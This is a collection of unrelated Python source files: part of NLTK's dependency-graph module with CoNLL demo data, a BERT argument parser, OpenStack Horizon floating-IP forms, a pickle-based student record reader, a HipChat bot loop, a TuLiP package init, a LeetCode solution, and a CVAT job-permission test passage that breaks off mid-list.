return "<DependencyGraph with {0} nodes>".format(len(self.nodes))
@staticmethod
def load(
filename, zero_based=False, cell_separator=None, top_relation_label="ROOT"
):
"""
:param filename: a name of a file in Malt-TAB format
:param zero_based: nodes in the input file are numbered starting from 0
rather than 1 (as produced by, e.g., zpar)
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
          identified, for example, `ROOT`, `null` or `TOP`.
:return: a list of DependencyGraphs
"""
with open(filename) as infile:
return [
DependencyGraph(
tree_str,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
for tree_str in infile.read().split("\n\n")
]
def left_children(self, node_index):
"""
Returns the number of left children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c < index)
def right_children(self, node_index):
"""
Returns the number of right children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c > index)
def add_node(self, node):
if not self.contains_address(node["address"]):
self.nodes[node["address"]].update(node)
def _parse(
self,
input_,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Parse a sentence.
:param extractor: a function that given a tuple of cells returns a
7-tuple, where the values are ``word, lemma, ctag, tag, feats, head,
rel``.
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
          identified, for example, `ROOT`, `null` or `TOP`.
"""
def extract_3_cells(cells, index):
word, tag, head = cells
return index, word, word, tag, tag, "", head, ""
def extract_4_cells(cells, index):
word, tag, head, rel = cells
return index, word, word, tag, tag, "", head, rel
def extract_7_cells(cells, index):
line_index, word, lemma, tag, _, head, rel = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, tag, tag, "", head, rel
def extract_10_cells(cells, index):
line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, ctag, tag, feats, head, rel
extractors = {
3: extract_3_cells,
4: extract_4_cells,
7: extract_7_cells,
10: extract_10_cells,
}
if isinstance(input_, str):
input_ = (line for line in input_.split("\n"))
lines = (l.rstrip() for l in input_)
lines = (l for l in lines if l)
cell_number = None
for index, line in enumerate(lines, start=1):
cells = line.split(cell_separator)
if cell_number is None:
cell_number = len(cells)
else:
assert cell_number == len(cells)
if cell_extractor is None:
try:
cell_extractor = extractors[cell_number]
except KeyError as e:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(cell_number)
) from e
try:
index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
cells, index
)
except (TypeError, ValueError):
# cell_extractor doesn't take 2 arguments or doesn't return 8
# values; assume the cell_extractor is an older external
# extractor and doesn't accept or return an index.
word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)
if head == "_":
continue
head = int(head)
if zero_based:
head += 1
self.nodes[index].update(
{
"address": index,
"word": word,
"lemma": lemma,
"ctag": ctag,
"tag": tag,
"feats": feats,
"head": head,
"rel": rel,
}
)
# Make sure that the fake root node has labeled dependencies.
if (cell_number == 3) and (head == 0):
rel = top_relation_label
self.nodes[head]["deps"][rel].append(index)
if self.nodes[0]["deps"][top_relation_label]:
root_address = self.nodes[0]["deps"][top_relation_label][0]
self.root = self.nodes[root_address]
self.top_relation_label = top_relation_label
else:
warnings.warn(
"The graph doesn't contain a node " "that depends on the root element."
)
def _word(self, node, filter=True):
w = node["word"]
if filter:
if w != ",":
return w
return w
def _tree(self, i):
""" Turn dependency graphs into NLTK trees.
:param int i: index of a node
:return: either a word (if the indexed node is a leaf) or a ``Tree``.
"""
node = self.get_by_address(i)
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
if deps:
return Tree(word, [self._tree(dep) for dep in deps])
else:
return word
def tree(self):
"""
Starting with the ``root`` node, build a dependency tree using the NLTK
``Tree`` constructor. Dependency labels are omitted.
"""
node = self.root
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
return Tree(word, [self._tree(dep) for dep in deps])
def triples(self, node=None):
"""
Extract dependency triples of the form:
((head word, head tag), rel, (dep word, dep tag))
"""
if not node:
node = self.root
head = (node["word"], node["ctag"])
for i in sorted(chain.from_iterable(node["deps"].values())):
dep = self.get_by_address(i)
yield (head, dep["rel"], (dep["word"], dep["ctag"]))
for triple in self.triples(node=dep):
yield triple
def _hd(self, i):
try:
return self.nodes[i]["head"]
except IndexError:
return None
def _rel(self, i):
try:
return self.nodes[i]["rel"]
except IndexError:
return None
# what's the return type? Boolean or list?
def contains_cycle(self):
"""Check whether there are cycles.
>>> dg = DependencyGraph(treebank_data)
>>> dg.contains_cycle()
False
>>> cyclic_dg = DependencyGraph()
>>> top = {'word': None, 'deps': [1], 'rel': 'TOP', 'address': 0}
>>> child1 = {'word': None, 'deps': [2], 'rel': 'NTOP', 'address': 1}
>>> child2 = {'word': None, 'deps': [4], 'rel': 'NTOP', 'address': 2}
>>> child3 = {'word': None, 'deps': [1], 'rel': 'NTOP', 'address': 3}
>>> child4 = {'word': None, 'deps': [3], 'rel': 'NTOP', 'address': 4}
>>> cyclic_dg.nodes = {
... 0: top,
... 1: child1,
... 2: child2,
... 3: child3,
... 4: child4,
... }
>>> cyclic_dg.root = top
>>> cyclic_dg.contains_cycle()
[3, 1, 2, 4]
"""
distances = {}
for node in self.nodes.values():
for dep in node["deps"]:
key = tuple([node["address"], dep])
distances[key] = 1
for _ in self.nodes:
new_entries = {}
for pair1 in distances:
for pair2 in distances:
if pair1[1] == pair2[0]:
key = tuple([pair1[0], pair2[1]])
new_entries[key] = distances[pair1] + distances[pair2]
for pair in new_entries:
distances[pair] = new_entries[pair]
if pair[0] == pair[1]:
path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
return path
return False # return []?
def get_cycle_path(self, curr_node, goal_node_index):
for dep in curr_node["deps"]:
if dep == goal_node_index:
return [curr_node["address"]]
for dep in curr_node["deps"]:
path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
if len(path) > 0:
path.insert(0, curr_node["address"])
return path
return []
def to_conll(self, style):
"""
The dependency graph in CoNLL format.
:param style: the style to use for the format (3, 4, 10 columns)
:type style: int
:rtype: str
"""
if style == 3:
template = "{word}\t{tag}\t{head}\n"
elif style == 4:
template = "{word}\t{tag}\t{head}\t{rel}\n"
elif style == 10:
template = (
"{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
)
else:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(style)
)
return "".join(
template.format(i=i, **node)
for i, node in sorted(self.nodes.items())
if node["tag"] != "TOP"
)
def nx_graph(self):
"""Convert the data in a ``nodelist`` into a networkx labeled directed graph."""
import networkx
nx_nodelist = list(range(1, len(self.nodes)))
nx_edgelist = [
(n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
]
self.nx_labels = {}
for n in nx_nodelist:
self.nx_labels[n] = self.nodes[n]["word"]
g = networkx.MultiDiGraph()
g.add_nodes_from(nx_nodelist)
g.add_edges_from(nx_edgelist)
return g
class DependencyGraphError(Exception):
"""Dependency graph exception."""
def demo():
malt_demo()
conll_demo()
conll_file_demo()
cycle_finding_demo()
def malt_demo(nx=False):
"""
A demonstration of the result of reading a dependency
version of the first sentence of the Penn Treebank.
"""
dg = DependencyGraph(
"""Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
)
tree = dg.tree()
tree.pprint()
if nx:
# currently doesn't work
import networkx
from matplotlib import pylab
g = dg.nx_graph()
g.info()
pos = networkx.spring_layout(g, dim=1)
networkx.draw_networkx_nodes(g, pos, node_size=50)
# networkx.draw_networkx_edges(g, pos, edge_color='k', width=8)
networkx.draw_networkx_labels(g, pos, dg.nx_labels)
pylab.xticks([])
pylab.yticks([])
pylab.savefig("tree.png")
pylab.show()
def conll_demo():
"""
A demonstration of how to read a string representation of
a CoNLL format dependency tree.
"""
dg = DependencyGraph(conll_data1)
tree = dg.tree()
tree.pprint()
print(dg)
print(dg.to_conll(4))
def conll_file_demo():
print("Mass conll_read demo...")
graphs = [DependencyGraph(entry) for entry in conll_data2.split("\n\n") if entry]
for graph in graphs:
tree = graph.tree()
print("\n")
tree.pprint()
def cycle_finding_demo():
dg = DependencyGraph(treebank_data)
print(dg.contains_cycle())
cyclic_dg = DependencyGraph()
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "TOP", "address": 0})
cyclic_dg.add_node({"word": None, "deps": [2], "rel": "NTOP", "address": 1})
cyclic_dg.add_node({"word": None, "deps": [4], "rel": "NTOP", "address": 2})
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "NTOP", "address": 3})
cyclic_dg.add_node({"word": None, "deps": [3], "rel": "NTOP", "address": 4})
print(cyclic_dg.contains_cycle())
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
if __name__ == "__main__":
demo()
|
import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
    # retrieve the general models.args and attach them here
parser = models.args.get_args()
# set search specific args
parser.add_argument('--model',
type=str,
default='MSR',
required=True)
parser.add_argument('--checkpoint',
type=str,
default='bert-base-uncased',
required=True,
help='A HuggingFace checkpoint e.g., bert-base-uncased')
parser.add_argument('--num-labels',
default=2,
type=int)
parser.add_argument('--max-seq-length',
default=86,
type=int,
help='Tokenization max length')
parser.add_argument('--save-path',
type=str,
default=os.path.join('model_checkpoints'))
parser.add_argument('--log-path',
type=str,
default=os.path.join('model_logs'))
parser.add_argument('--warmup-proportion',
default=0.1,
type=float,
help='Proportion of training to perform linear learning rate warmup for')
parser.add_argument('--batch-size',
type=int,
default=16,
help='input batch size for training (default: 16)')
parser.add_argument('--lr',
type=float,
default=1e-5,
help='learning rate (default: 1e-5)')
parser.add_argument('--num-workers',
type=int,
default=0,
help='Number of CPU cores (default: 0)')
parser.add_argument('--shard',
type=float,
default=0.10,
help='Percentage of training set to sample from')
args = parser.parse_args()
return args
#
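# Usage sketch (hypothetical module path; only --model and --checkpoint are
# required, everything else falls back to the defaults defined above):
#   python -m models.msr.main --model MSR --checkpoint bert-base-uncased \
#       --batch-size 32 --lr 2e-5
if __name__ == '__main__':
    print(get_args())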
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django import shortcuts
from django.utils.translation import ugettext as _
from novaclient import exceptions as novaclient_exceptions
from horizon import api
from horizon import forms
LOG = logging.getLogger(__name__)
class ReleaseFloatingIp(forms.SelfHandlingForm):
floating_ip_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
LOG.info('Releasing Floating IP "%s"' % data['floating_ip_id'])
api.tenant_floating_ip_release(request, data['floating_ip_id'])
messages.info(request, _('Successfully released Floating IP: %s')
% data['floating_ip_id'])
        except novaclient_exceptions.ClientException as e:
LOG.exception("ClientException in ReleaseFloatingIp")
messages.error(request, _('Error releasing Floating IP '
'from tenant: %s') % e.message)
return shortcuts.redirect(request.build_absolute_uri())
class FloatingIpAssociate(forms.SelfHandlingForm):
floating_ip_id = forms.CharField(widget=forms.HiddenInput())
floating_ip = forms.CharField(widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
instance_id = forms.ChoiceField()
def __init__(self, *args, **kwargs):
super(FloatingIpAssociate, self).__init__(*args, **kwargs)
instancelist = kwargs.get('initial', {}).get('instances', [])
self.fields['instance_id'] = forms.ChoiceField(
choices=instancelist,
label=_("Instance"))
def handle(self, request, data):
try:
api.server_add_floating_ip(request,
data['instance_id'],
data['floating_ip_id'])
LOG.info('Associating Floating IP "%s" with Instance "%s"'
% (data['floating_ip'], data['instance_id']))
messages.info(request, _('Successfully associated Floating IP: \
%(ip)s with Instance: %(inst)s'
% {"ip": data['floating_ip'],
"inst": data['instance_id']}))
        except novaclient_exceptions.ClientException as e:
LOG.exception("ClientException in FloatingIpAssociate")
messages.error(request, _('Error associating Floating IP: %s')
% e.message)
return shortcuts.redirect('horizon:nova:floating_ips:index')
class FloatingIpDisassociate(forms.SelfHandlingForm):
floating_ip_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
fip = api.tenant_floating_ip_get(request, data['floating_ip_id'])
api.server_remove_floating_ip(request, fip.instance_id, fip.id)
LOG.info('Disassociating Floating IP "%s"'
% data['floating_ip_id'])
messages.info(request,
_('Successfully disassociated Floating IP: %s')
% data['floating_ip_id'])
        except novaclient_exceptions.ClientException as e:
            LOG.exception("ClientException in FloatingIpDisassociate")
messages.error(request, _('Error disassociating Floating IP: %s')
% e.message)
return shortcuts.redirect('horizon:nova:floating_ips:index')
class FloatingIpAllocate(forms.SelfHandlingForm):
tenant_id = forms.CharField(widget=forms.HiddenInput())
def handle(self, request, data):
try:
fip = api.tenant_floating_ip_allocate(request)
LOG.info('Allocating Floating IP "%s" to tenant "%s"'
% (fip.ip, data['tenant_id']))
messages.success(request,
_('Successfully allocated Floating IP "%(ip)s"\
to tenant "%(tenant)s"')
% {"ip": fip.ip, "tenant": data['tenant_id']})
        except novaclient_exceptions.ClientException as e:
LOG.exception("ClientException in FloatingIpAllocate")
messages.error(request, _('Error allocating Floating IP "%(ip)s"\
to tenant "%(tenant)s": %(msg)s') %
{"ip": fip.ip, "tenant": data['tenant_id'], "msg": e.message})
return shortcuts.redirect('horizon:nova:floating_ips:index')
|
# display records of students with roll numbers 22 and 23.
import pickle
stu = {} #declare empty dictionary object; it will hold record
found = False
finObj = open('Stu.dat',"rb") #open binary file in read mode
searchKeys = [22,23]
#read from the file
try:
print("File Stu.dat store these records")
    while True:  # loop ends when pickle.load raises EOFError at end of file
        stu = pickle.load(finObj)  # read one record (a dict) from the finObj file handle
if stu['Rollno'] in searchKeys:
print(stu) #print the record
found = True
except EOFError:
if found == False:
print("No such records found in the file")
else:
print("Search successful.")
finObj.close() #close file
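# For reference, a small helper (an addition; field names other than 'Rollno'
# are assumptions) showing how a file like Stu.dat can be created with pickle:
def write_sample_records(path="Stu_sample.dat"):
    records = [{'Rollno': 22, 'Name': 'Asha'}, {'Rollno': 23, 'Name': 'Bala'}]
    with open(path, "wb") as foutObj:      # open binary file in write mode
        for rec in records:
            pickle.dump(rec, foutObj)      # one pickled dict per student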
|
from hipchat import HipChatManager
import time
import configparser
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
def __init__(self, eodBotParser):
print("Initializing HipChatMonitor with eodBotParser: ",eodBotParser)
self.sleepTime = _MIN_SLEEP_TIME
self.lastIdChecked = ""
self.eodBotParser = eodBotParser
config = configparser.ConfigParser()
config.read('config.ini')
self.bot_id=config['HIPCHAT']['hipchat.bot_id']
self.hipChatManager = HipChatManager.HipChatManager();
self.spamLastEodBotUrlTime = 0
self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
def __adjustInterval(self, failed):
if(failed == "true"):
if(self.sleepTime < _MAX_SLEEP_TIME):
self.sleepTime += 1
else:
self.sleepTime = _MIN_SLEEP_TIME
def start(self):
        while True:
newestMessage = self.hipChatManager.fetch()
if((str(newestMessage["from"]) != "Sassy") and (str(newestMessage["from"]["id"]) != self.bot_id) and (newestMessage["id"] != self.lastIdChecked)):
self.lastIdChecked = newestMessage["id"]
print("Parsing message: ",newestMessage['message'])
messageToSend = self.eodBotParser.parse(newestMessage['message'])
if(messageToSend != None):
self.hipChatManager.send(messageToSend)
self.__adjustInterval("false")
else:
self.__adjustInterval("true")
print("Sleeping for ",self.sleepTime," seconds")
time.sleep(self.sleepTime)
self.spamLastEodBotUrlTime += 1
if(self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL):
self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
self.spamLastEodBotUrlTime = 0
|
# Copyright (c) 2013-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
"""TuLiP Toolbox Transition System subpackage
Suggested abbreviation:
>>> from tulip import transys as trs
"""
from __future__ import absolute_import
from .mathset import MathSet, SubSet, PowerSet, TypedDict
from .labeled_graphs import prepend_with
from .transys import (
KripkeStructure, FiniteTransitionSystem, FTS,
LabeledGameGraph,
tuple2fts, line_labeled_with, cycle_labeled_with
)
from .automata import (
BuchiAutomaton, BA, tuple2ba,
RabinAutomaton, DRA,
ParityGame
)
from .machines import MooreMachine, MealyMachine
from .products import OnTheFlyProductAutomaton
|
from typing import List
class Solution:
    def findNumbers(self, nums: List[int]) -> int:
        # collect the values that have an even number of digits
        bkt = []
        for n in nums:
            if len(str(n)) % 2 == 0:
                bkt.append(n)
        return len(bkt)
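# Quick check (values from the well-known LeetCode #1295 example; 12 and 7896
# have an even digit count, so the expected answer is 2):
if __name__ == "__main__":
    print(Solution().findNumbers([12, 345, 2, 6, 7896]))  # -> 2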
|
# Copyright (C) 2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
from http import HTTPStatus
from deepdiff import DeepDiff
import pytest
from .utils.config import get_method, patch_method
def get_job_staff(job, tasks, projects):
job_staff = []
job_staff.append(job['assignee'])
tid = job['task_id']
job_staff.append(tasks[tid]['owner'])
job_staff.append(tasks[tid]['assignee'])
pid = job['project_id']
if pid:
job_staff.append(projects[pid]['owner'])
job_staff.append(projects[pid]['assignee'])
job_staff = set(u['id'] for u in job_staff if u is not None)
return job_staff
def filter_jobs(jobs, tasks, org):
if org is None:
kwargs = {}
jobs = jobs.raw
elif org == '':
kwargs = {'org': ''}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] is None]
else:
kwargs = {'org_id': org}
jobs = [job for job in jobs
if tasks[job['task_id']]['organization'] == org]
return jobs, kwargs
class TestGetJobs:
def _test_get_job_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()) == {}
def _test_get_job_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_get_job(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
        # keep only a reasonable number of jobs
for job in jobs[:8]:
self._test_get_job_200('admin2', job['id'], job, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_get_job(self, org_id, groups, users, jobs, tasks, projects,
org_staff):
        # keep only a reasonable number of users and jobs
users = [u for u in users if u['groups'] == groups][:4]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for job in jobs[:8]:
job_staff = get_job_staff(job, tasks, projects)
            # check whether the specific user is in job_staff and may see the job
for user in users:
if user['id'] in job_staff | org_staff:
self._test_get_job_200(user['username'], job['id'], job, **kwargs)
else:
self._test_get_job_403(user['username'], job['id'], **kwargs)
class TestListJobs:
def _test_list_jobs_200(self, user, data, **kwargs):
response = get_method(user, 'jobs', **kwargs, page_size=all)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json()['results']) == {}
def _test_list_jobs_403(self, user, **kwargs):
response = get_method(user, 'jobs', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [None, '', 1, 2])
def test_admin_list_jobs(self, jobs, tasks, org):
jobs, kwargs = filter_jobs(jobs, tasks, org)
self._test_list_jobs_200('admin1', jobs, **kwargs)
@pytest.mark.parametrize('org_id', ['', None, 1, 2])
@pytest.mark.parametrize('groups', [['business'], ['user'], ['worker'], []])
def test_non_admin_list_jobs(self, org_id, groups, users, jobs, tasks,
projects, org_staff, is_org_member):
users = [u for u in users if u['groups'] == groups][:2]
jobs, kwargs = filter_jobs(jobs, tasks, org_id)
org_staff = org_staff(org_id)
for user in users:
user_jobs = []
for job in jobs:
job_staff = get_job_staff(job, tasks, projects)
if user['id'] in job_staff | org_staff:
user_jobs.append(job)
if is_org_member(user['id'], org_id):
self._test_list_jobs_200(user['username'], user_jobs, **kwargs)
else:
self._test_list_jobs_403(user['username'], **kwargs)
class TestGetAnnotations:
def _test_get_job_annotations_200(self, user, jid, data, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
def _test_get_job_annotations_403(self, user, jid, **kwargs):
response = get_method(user, f'jobs/{jid}/annotations', **kwargs)
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('groups, job_staff, is_allow', [
(['admin'], True, True), (['admin'], False, True),
(['business'], True, True), (['business'], False, False),
(['worker'], True, True), (['worker'], False, False),
(['user'], True, True), (['user'], False, False)
])
def test_user_get_job_annotations(self, org, groups, job_staff,
is_allow, users, jobs, tasks, annotations, find_job_staff_user):
users = [u for u in users if u['groups'] == groups]
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('owner', True, True), ('owner', False, True),
('maintainer', True, True), ('maintainer', False, True),
('supervisor', True, True), ('supervisor', False, False),
